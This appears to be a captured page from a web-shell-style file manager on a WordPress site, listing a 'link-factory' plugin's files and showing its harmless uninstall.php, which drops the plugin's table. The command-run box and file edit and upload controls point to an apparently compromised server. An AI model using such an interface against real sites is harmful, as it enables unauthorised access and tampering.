/
home
/
cp072267
/
public_html
/
dkrgroupholdings.com
/
wp-content
/
plugins
/
link-factory
/
/home/cp072267/public_html/dkrgroupholdings.com/wp-content/plugins/link-factory
mkdir
upload
Name
Size
Mode
Actions
includes/
-
0755
rm
link-factory.php
1563
0644
edit
dl
rm
readme.txt
2703
0644
edit
dl
rm
uninstall.php
370
0644
edit
dl
rm
Edit:
/home/cp072267/public_html/dkrgroupholdings.com/wp-content/plugins/link-factory/uninstall.php
(370B)
<?php /** * Fires when the Link Factory plugin is deleted via wp-admin. * * Drops the sentences table so a subsequent reinstall starts from a clean slate. * * @package LinkFactory */ if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) ) { return; } global $wpdb; $table_name = $wpdb->prefix . 'link_factory_sentences'; $wpdb->query( "DROP TABLE IF EXISTS {$table_name}" );
Save
cmd:
run